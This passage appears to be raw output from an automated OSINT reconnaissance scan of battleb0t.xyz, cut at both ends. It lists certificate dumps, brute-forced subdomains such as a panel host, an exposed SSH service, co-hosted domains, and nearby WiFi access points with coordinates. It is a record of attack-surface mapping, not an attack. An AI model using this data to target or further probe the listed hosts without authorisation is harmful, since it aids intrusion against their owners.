d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:54:05.304 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2E:CD:16:75:5B:83:CE:34:DE:4E:0B:A5:
8F:CD:7C:C7:A7:A6:A9:11:C3:23:E1:0B:2A:31:9F:95:
73:C3:42:80:02:20:7B:D0:4F:D2:8B:72:CA:32:B2:4D:
CC:40:AA:8E:75:E9:77:4A:4F:D1:BA:D8:AE:0C:6B:30:
9E:04:63:28:D1:A8
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:54:05.294 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:F1:66:52:35:FF:56:8B:1D:79:47:47:
A7:1C:C3:D5:F7:A4:62:11:6E:72:13:33:6A:75:28:8C:
74:B2:4C:10:76:02:20:1B:97:A6:E2:6C:65:7B:C8:CD:
9F:BB:59:01:45:C5:3A:6B:BD:4B:C8:1B:69:3F:61:01:
38:DF:1A:9C:5B:33:60
Signature Algorithm: sha256WithRSAEncryption
ae:79:f7:6d:1b:71:32:86:32:db:2a:16:1c:43:90:9b:83:62:
0f:e8:c8:45:a2:74:39:9e:47:95:60:f9:a9:0f:5f:8f:26:9e:
6a:cb:48:fc:28:9f:be:95:de:3f:18:f2:a2:6b:df:e9:ed:0e:
0c:fe:77:c0:f9:43:13:cf:28:62:3e:eb:89:e6:eb:03:ba:b6:
65:d3:6f:26:2f:e2:cd:15:59:82:3c:0e:ae:d9:44:2e:69:94:
35:68:67:b8:2a:60:2d:04:59:19:48:8b:a7:19:32:be:3f:d4:
97:45:fa:e8:74:5a:8f:72:87:86:27:6f:fd:8c:2b:a4:50:d9:
22:2e:d0:5b:e8:25:5b:f1:50:e7:fa:72:45:0e:76:e9:66:71:
c9:e1:a7:8b:e8:5b:83:ac:a2:bc:89:be:14:a7:12:48:15:b7:
d6:1e:fe:ad:98:76:3e:16:2c:cf:38:d6:a3:13:69:b2:c3:42:
11:42:e6:c6:c6:df:61:d7:1c:e4:ca:7f:bc:9e:71:30:82:fe:
d4:6f:58:81:ab:0e:55:97:bb:c1:5d:e3:30:ef:17:60:9b:37:
2f:f7:be:34:13:0e:a6:78:95:12:19:fc:1f:5c:b8:e7:4a:08:
f6:f1:db:51:99:1c:e2:4d:5a:42:03:0e:eb:74:29:12:8b:42:
4a:ad:db:87
| battleb0t.xyz |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayiu.xyz | ayhu.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_2.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | vulcan (Net ID: 00:02:8A:AD:D0:F3) | 39.0469, -77.4903 |
| 2023-05-12 03:25:06 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | panel.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | EAP6005G (Net ID: 00:02:6F:EB:3F:8B) | 50.8897, 6.0563 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | 165.232.113.85 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:44:37 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:5e:3d:7d:a9:f5:42:9c:1d:2f:03:2d:1b:0d:2f:10:cb:50:
f1:b5:52:99:81:26:41:e3:0e:8b:3f:d6:44:9c:4d:76:a0:c9:
2e:6c:74:7c:a4:74:32:5e:57:3b:4d:1a:2e:c8:ca:50:8a:41:
64:52:bd:34:33:b5:79:5d:6f:b7:40:8d:f2:19:bb:9c:7a:f4:
53:d5:b8:14:be:47:eb:83:11:3f:9b:a8:6d:e6:50:9c:00:fd:
45:a4:e9:b5:c8:1a:e6:9f:65:a0:32:31:9a:f4:eb:55:67:d1:
e8:ef:64:3e:f6:9d:83:1d:d7:4f:bc:78:a6:79:31:b0:72:dc:
bc:76:08:92:82:2c:2d:62:96:6a:ea:10:aa:8b:9f:01:37:82:
68:e8:21:18:0b:93:ec:a2:d9:e4:7d:db:8d:03:6c:29:66:26:
48:37:dc:c6:b4:07:9f:89:13:5d:3c:d0:15:d9:f0:41:fb:6f:
a6:03:d7:5c:9d:60:ab:11:be:88:8c:49:85:6b:01:3f:1f:cf:
9f:fe:17:89:e9:00:42:c3:57:e3:c8:42:f8:cd:c4:7b:bc:1f:
29:1b:d5:94:0f:7c:11:23:e1:b3:ae:8d:51:5a:7e:0b:bb:e0:
95:37:98:35:9f:61:ad:e4:68:dc:1c:77:b3:9e:f7:ce:95:dd:
52:35:dd:a6
|
| 2023-05-12 03:00:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.53): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:49:5B:22:9A:37:74:EC:B5:6B:BF:74:25:
03:BF:46:DC:18:51:D6:44:11:7B:BF:B6:5B:50:DD:1C:
8F:80:EF:3B:02:20:47:2A:69:10:84:9E:DC:B5:E3:E3:
85:D7:64:E9:81:E6:34:A8:3A:EE:7B:C1:B6:5E:40:1F:
80:29:DA:11:05:13
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:7C:BF:0E:AA:9D:74:86:07:D7:D4:AB:
F5:E1:40:37:B8:BB:7E:DB:39:8A:BE:E2:5C:03:30:30:
87:33:6B:95:02:20:09:90:FF:C6:9A:73:8C:96:C5:27:
7D:6B:43:B6:38:71:2C:A6:63:43:70:C3:FA:5D:5B:71:
98:69:EE:13:00:4E
Signature Algorithm: sha256WithRSAEncryption
85:ff:2d:f7:ea:a0:91:b7:ce:aa:d9:bb:80:7c:e2:3c:82:5e:
aa:e4:8e:68:39:36:38:9c:77:b6:ea:24:b5:71:a4:68:73:d2:
cb:e4:b6:6e:87:92:cd:60:f0:4b:fa:16:3c:67:67:24:50:45:
a7:67:96:84:cc:d3:58:c6:5e:dc:44:85:ed:d6:81:ec:7f:49:
41:4d:c5:ca:ca:aa:32:ad:d7:11:f7:39:7b:b0:7b:77:74:44:
f7:cb:92:93:e4:45:e9:c1:4b:22:0e:6a:87:26:da:2f:86:c9:
2f:7d:8a:b8:0e:fa:c8:7d:05:d7:2e:5e:0f:61:c0:b7:f9:d9:
51:31:63:4f:68:5d:de:cc:22:12:04:48:9b:ee:41:d8:a5:b1:
3c:80:9c:7b:d1:ae:a7:5b:ac:bf:bc:03:e4:36:bf:0d:18:f2:
3c:c8:4d:81:d8:71:4f:93:f8:89:4f:b8:cc:c6:d5:23:b9:6b:
01:1a:ea:aa:63:1c:40:bd:2f:59:0a:34:b7:be:8a:f1:7e:27:
85:d0:0e:96:7f:f0:0b:eb:18:35:77:95:6b:27:bf:9c:18:72:
58:89:63:0e:ed:84:1b:cb:e1:47:d4:7e:b0:01:ca:b1:c2:f0:
7c:b9:e4:20:fc:db:bd:c2:a6:6c:47:1a:fc:14:e6:86:84:df:
57:0b:c2:0b
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | cPanel cPanel | 87.248.157.102 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:32 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["E9B4:1F0F:9CADE8:E25A67:645D08C5"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100040-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683818693.056035,VS0,VE27"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": 